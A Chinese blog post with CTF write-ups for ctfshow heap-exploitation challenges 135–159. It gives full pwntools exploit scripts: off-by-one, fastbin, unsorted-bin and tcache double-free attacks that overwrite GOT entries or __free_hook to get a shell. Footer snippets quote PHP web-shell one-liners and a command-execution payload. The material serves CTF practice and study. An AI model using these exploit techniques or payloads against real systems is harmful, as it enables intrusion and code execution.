ctfshow [堆利用-前置基础] 135-159题--更新完毕

已于 2024-08-10 18:36:46 修改
阅读量790 收藏 5
点赞数 7
CC 4.0 BY-SA版权
分类专栏: PWN 文章标签: 网络安全
于 2024-07-08 15:47:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/KaliLinux_V/article/details/140270855

先把这篇博客放在这里有时间就更。主要是太懒了,又是颓废的一天。

pwn135

这题主要是让我们知道realloc,calloc,malloc三个函数的作用自己用gdb调试就行了。
运行输入4就能拿到flag

相关文章:malloc、realloc、calloc的区别

pwn136

free堆块反汇编代码简单易懂,直接输入4就能拿到flag。
至于free的原理自己百度就行了,太简单不想打字了。

pwn137

关于**sbrk()函数和brk()**函数可以参见《CTF竞赛权威指南》第11章。
芜湖
芜湖
相关链接:brk和sbrk

pwn138

当用户申请内存过大时,ptmalloc2会选择通过mmap()函数创建匿名映射段供用户使用,并通过unmmap()函数进行回收。
详细内容参见:《CTF竞赛权威指南 PWN篇》
相关链接:mmap函数的详细讲解
【Linux系统编程】25.mmap、munmap

pwn139-pwn140.(不想写,直接运行拿flag)

pwn141

简单的UAF,不写了

add(32, b'aaaa')
add(32, b'bbbb')

delete(0)
delete(1)

add(0x8, p32(0x8049684))

show(0)

pwn 142

edit函数中存在off-by-one漏洞。

exp如下:

from pwn import *
from LibcSearcher import *

# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28125)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/buu_libc-2.27-64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

gadget = [0x45216,0x4526a,0xf02a4,0xf1147]

def add(size,data):
	sla(b"Your choice :",b"1")
	sla(b"Size of Heap : ",str(size))
	ru(b"Content of heap:")
	s(data)

def edit(idx,data):
	sla(b"Your choice :",b"2")
	sla(b'Index :',str(idx))
	ru(b"Content of heap : ")
	s(data)

def show(idx):
	sla(b"Your choice :",b"3")
	sla(b'Index :',str(idx))


def free(idx):
	sla(b"Your choice :",b"4")
	sla(b'Index :',str(idx))

ptr_chunk = 0x6020A0
free_got = elf.got['free']
puts_addr = elf.plt['puts']

add(0x18,b"aaa")
add(0x18,b"aaa")
add(0x18,b"/bin/sh;")

edit(0,b"c"*0x18+p8(0x41))
free(1)
add(0x38,p64(0)*3+p64(0x21)+p64(0x100)+p64(free_got))
show(1)
free_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
libc = LibcSearcher("free",free_addr)
libc_base = free_addr-libc.dump("free")
system_addr = libc_base+libc.dump("system")
print("libc_base------------->:",hex(libc_base))

edit(1,p64(system_addr))
free(2)

# gdb.attach(io)

itr()

pwn 143

这里有后门函数,一开始没看到,打完才看到,所以我这里用的是常规方法。注意一下在got表中free的下一个地址是puts函数的,所以再改完free函数的got表时,还要把下一个地址换成puts函数的,不然要报错

from pwn import *
from LibcSearcher import *

# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28307)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/buu_libc-2.23-64.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

gadget = [0x45216,0x4526a,0xf02a4,0xf1147]


def show():
	sla(b"Your choice:",b"1")

def add(size,data):
	sla(b"Your choice:",b"2")
	sla(b"Please enter the length:",str(size))
	ru(b"Please enter the name:")
	s(data)

def edit(idx,size,data):
	sla(b"Your choice:",b"3")
	sla(b"Please enter the index:",str(idx))
	sla(b"Please enter the length of name:",str(size))
	ru(b"Please enter the new name:")
	s(data)

def free(idx):
	sla(b"Your choice:",b"4")
	sla(b"Please enter the index:",str(idx))


fake_chunk = 0x6020A8-0x1b
free_got = elf.got['free']
puts_plt = elf.plt['puts']

add(0x60,b"aaaa")
add(0x60,b"aaaa")
add(0x60,b"/bin/sh;")

free(1)
edit(0,0x100,p64(0)*13+p64(0x71)+p64(fake_chunk))
add(0x60,b"aaaa")
add(0x60,b"a"*0xb+p64(free_got))

show()
free_addr = u64(io.recvuntil(b"\x7f")[-6:].ljust(8,b"\x00"))
libc_base = free_addr-libc.sym['free']
puts_addr = libc_base+libc.sym['puts']
system_addr = libc_base+libc.sym['system']
print("libc_base---------------->: ",hex(libc_base))

edit(0,0x100,p64(system_addr)+p64(puts_addr))
free(2)

# gdb.attach(io)

itr()

pwn 144

堆溢出+unsound bin attack ,简单题。

from pwn import *
from LibcSearcher import *

# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
io = remote("pwn.challenge.ctf.show", 28146)
# io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.23.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

gadget = [0x45216,0x4526a,0xf02a4,0xf1147]


def add(size,data):
	sla(b"Your choice :",b"1")
	sla(b"Size of Heap : ",str(size))
	ru(b"Content of heap:")
	s(data)


def edit(idx,size,data):
	sla(b"Your choice :",b"2")
	sla(b'Index :',str(idx))
	sla(b"Size of Heap : ",str(size))
	ru(b"Content of heap : ")
	s(data)

def free(idx):
	sla(b"Your choice :",b"3")
	sla(b"Index :",str(idx))


add(0x70,b"aaaa")
add(0x80,b"aaaa")
add(0x70,b"aaaa")

magic_addr = 0x6020A0

free(1)
edit(0,0x100,b"a"*0x70+p64(0)+p64(0x91)+p64(0)+p64(magic_addr-0x10))
add(0x80,b"aaaa")
sl(b"114514")


# gdb.attach(io)




itr()

pwn 145(命令执行,自己调试就行)

pwn 146

运行直接拿,不懂的自己百度。

pwn 147-158(直接运行,不想写了)

pwn 159

漏洞点

芜湖
这里可以看到read这里其实纯在一个off-by-one的漏洞,因为当我们输入的a2为2时理应只能读2个字符,但当v3等于1时还会再次读一个字符,导致多读了一个字符,存在off-by-one。但是最后又有一个 result = &a1[a2]; *result = 0; 这就导致了整个函数存在off-by-null。(当且仅当size=0xf8时存在)。

解题思路

首先这题是libc-2.27的存在tcachebins,我们得先泄露libc的地址才行。这里就要利用off-by-null的漏洞,利用unlink合并时unsorted bin的特性泄露mian_arenas。

for i in range(10):
	add(0xf0,b"aaaa")

for i in range(6):
	free(i)
free(9)

这里先创建10个chunk,因为tcachebins要填满7个才能进入unsorted bin。方便后续利用。然后再free掉7个chunk,这里free(9)时为了防止与top chunk合并。(如下图)

芜湖

for i in range(6,9):
	free(i)

for i in range(10):
	add(0xf0,b"aaaa")

然后再free掉chunk6,chunk7,chunk8。这三个chunk会进入unsorted bin合并为0x300大小的chunk。之后再全部申请回来,可以看到chunk的布局已经变了,如下图。

芜湖

for i in range(6):
	free(i)
free(8)
free(7)

add(0xf8,b"aaaa")
free(6)
free(9)

for i in range(7):
	add(0xf0,b"aaaa")

add(0xf0,b"bbbb")
show(0)

这里先free掉6个chunk,但没有free掉我们要操控的chunk6,7,8
然和free8让chunk7进入tcachebins,free7让chunk6进入unsorted bin。
芜湖
芜湖

然后申请回chunk7,这时候chunk8的size位已经被改了。然后再连续free两个,让chunk8进入unsorted bin。

到现在 我们要用的chunk6 ,chunk8,已经被真正free掉了,chunk7虽然也在unsorted bin中,但这个是被unlink合并了,并没有真正free
芜湖

芜湖

之后就是申请回7个chunk,再把chunk6申请回来,这时候main_arenas已经写进了chunk7。这时候show(0)就能打印出来了。
芜湖
接下来就是常规的double free了。这里再申请0xf0大小的chunk我们就能拿到两个chunk7。

add(0xf0,b"bbbb")
free(0)
free(1)
free(9)
add(0xf0,p64(free_hook))

for i in range(2,9):
	free(i)

for i in range(7):
	add(0xf0,b"aaaas")

add(0xf0,p64(one_gadget))

芜湖
最后double free改到free_hook处,写onegadget。

完整EXP

from pwn import *
from LibcSearcher import *

# context(log_level='debug',arch='i386', os='linux')
context(log_level='debug',arch='amd64', os='linux')


pwnfile = "./pwn"
# io = remote("pwn.challenge.ctf.show", 28210)
io = process(pwnfile)
elf = ELF(pwnfile)
libc = ELF("./libc/libc-2.27.so")

s       = lambda data               :io.send(data)
sa      = lambda delim,data         :io.sendafter(delim, data)
sl      = lambda data               :io.sendline(data)
sla     = lambda delim,data         :io.sendlineafter(delim, data)
r       = lambda num=4096           :io.recv(num)
ru      = lambda delims		    :io.recvuntil(delims)
itr     = lambda                    :io.interactive()
uu32    = lambda data               :u32(data.ljust(4,b'\x00'))
uu64    = lambda data               :u64(data.ljust(8,b'\x00'))
leak    = lambda name,addr          :log.success('{} = {:#x}'.format(name, addr))
lg      = lambda address,data       :log.success('%s: '%(address)+hex(data))

gadget = [0x4f2c5,0x4f322,0x10a38c,0xf1147]

def add(size,data):
	sla(b"> ",b"1")
	sla(b"> ",str(size))
	ru(b"> ")
	sl(data)

def free(idx):
	sla(b"> ",b"2")
	sla(b"> ",str(idx))


def show(idx):
	sla(b"> ",b"3")
	sla(b"> ",str(idx))


for i in range(10):
	add(0xf0,b"aaaa")

for i in range(6):
	free(i)

free(9)
for i in range(6,9):
	free(i)

for i in range(10):
	add(0xf0,b"aaaa")

for i in range(6):
	free(i)

free(8)
free(7)

add(0xf8,b"aaaa")
free(6)
free(9)

for i in range(8):
	add(0xf0,b"aaaa")

show(0)
main_arena = uu64(r(6))
libc_base = main_arena-0x10-96-libc.sym['__malloc_hook']
one_gadget = libc_base+gadget[1]
free_hook = libc_base+libc.sym['__free_hook']

print("libc_base-------------->: ",hex(libc_base))

add(0xf0,b"aaaa")

free(0)
free(9)

add(0xf0,p64(free_hook))
add(0xf0,b"aaaa")

for i in range(9):
	free(i)

for i in range(7):
	add(0xf0,b"aaaa")	

add(0xf0,p64(one_gadget))
free(1)



# gdb.attach(io)




itr()
springboot整合sharding-jdbc实现分库分表详解
congge
05-21 8293
springboot整合sharding-jdbc实现分库分表详解
HarmonyOS从基础到实战-高性能华为在线答元服务
热门推荐
一键难忘的博客
11-21 15万+
HarmonyOS从基础到实战-高性能华为在线答元服务 在本文中,我们介绍了一个关于在线答应用的项目,其中包括项目结构和开发计划。项目主要分为主应用的Ability(entryability)、卡片的Ability(Entnyformability)、从云数据库导出的数据类型(Models)以及页面代码文件夹(Pages)等模块。使用了两个重要的配置文件,分别是agconnect-services.json和schema.json,用于连接serverless服务和云端配置信息。
ctfshow 利用前置基础 pwn 141~159 wp(已完结)
最新发布
2502_91269216的博客
03-19 1329
2.注意我们的add和delete部分,delete部分在释放后是不会置零的,所以在add部分,我们哪怕释放了无数个chunck,他的指针都不是零,指针不是零这个位置就不会用来申请新的chunck,所以我们第三次add时其实申请在序号2,序号为0的组别始终存储着我们第一次申请时的那一组chunck1和chunck2。此时,由于tcache bin先释放后被申请的特性,下面的那个allocated chunck是此时的chunck1,上面的那个allocated chunck才是此时的chunck2。
CTFshow php特性 web135
Kradress的博客
12-17 1234
目录源码思路解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Firebasky # @Date: 2020-10-13 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-16 18:48:03 */ error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']
CTFshow PWN162 利用技巧大杂烩
2301_79252433的博客
08-21 1119
算是目前在CTFshow做过的最有意思的一道了,记录一下前情提示:本利用了fastbin_double_free,unsortedbin_attack,利用_IO_2_1_stdout泄露libc,house of spirit,UAF现在让我们来分析目,查看菜单,给出了三个功能:add,view,delete。view是生成一只猪,就看看吧。哈哈哈~~~但它没有打印功能,丸辣,看看怎么泄露libc!!强推所有add函数(以下展示都是我加过注释后的)
ctfshow [利用]-----160-180持续更新
saulgoodman的博客
07-10 1735
嘿嘿嘿!还是先摆在这里,有时间就更新
ctfshow php特性[125-135]
weixin_44770698的博客
01-16 1318
ctfshow php特性125-135
ctfshow web入门 php特性 web131-web135
m0_62207170的博客
10-05 835
ctfshow web入门 php特性 web131-web135
CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5513
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 588
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
ctfshow-web入门-爆破wp
m0_53567065的博客
11-01 1283
ctfshow-web入门-爆破wp
CTFshow 文件上传 web159
Kradress的博客
02-15 536
目录思路总结 思路 直接在burp里面改target和host的值,或者在本地发包 成功上传.user.ini auto_prepend_file=shell.png 相比之前目的过滤发现()也不能用了,不过可以用取反和异或来绕过 不需要括号的函数 echo require include Y1ng师傅的取反脚本,用data协议来执行代码 <?php $a = "data://text/plain,<?php system('tac ../f*');?>"; echo "~
ctfshow(159->162)--文件上传漏洞
m0_56019217的博客
10-30 849
前端校验+MIME验证+黑名单。
ctfshow学习记录-web入门(php特性137-146)
龟速更新的九某人
08-01 1636
ctfshow学习记录-web入门(php特性web137-web146)
CTFSHOW 文件上传 151-170
Landasika的博客
05-17 649
预备知识 1、一句话木马: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> phtml:GIF89a? ...
ctfshow学习记录-web入门(php特性127-136)
龟速更新的九某人
07-26 1769
ctfshow学习记录-web入门(php特性web127-136)
ctfshow web入门 PHP特性后篇(web133-web150)
ccfly1012的博客
09-13 2162
目录 web133 web134 web135 web136 web137 web138 web139 web140 web141 web142 wen143 web144 web145-web150 web133 error_reporting(0); highlight_file(__FILE__); //flag.php if($F = @$_GET['F']){ if(!preg_match('/system|nc|wget|exec|passthru|net
CTFShow-WEB入门篇文件上传详细Wp(151-170)
Aluxian_的博客
07-16 2828
【代码】CTFShow-WEB入门篇文件上传详细Wp(115-170)
ctfshow-web入门-php特性(web132-web136)
Welcome To Myon'Blog !
07-25 2142
mt_rand(1, 0x36D) 会生成一个 1 到 877(十六进制0x36D)的随机数,因此 $code === mt_rand(1,0x36D) 这个条件很难满足,因为每次都会生成一个新的随机数,$code 很难与这个随机数相等。tr -cd 'a-zA-Z0-9-' 这个命令会删除所有不是字母、数字、减号的内容,原本我想将大括号也保留,但是试了下不行。flag 分为了两段,flag1 和 flag2,拼接起来,字母都改成小写字母,添加上大括号即可。
国标1376.1-2014电能采集终端前置机软件详解
### 国标1376.1-2014采集终端前置机程序 #### 标解析 标中提到的“国标1376.1-2014”是指中国的国家标准GB/T 1376.1-2014,具体为“电能信息采集系统技术规范”。这个规范详细规定了电能信息采集系统的各项...
评论 7
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

saulgoodman-q

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值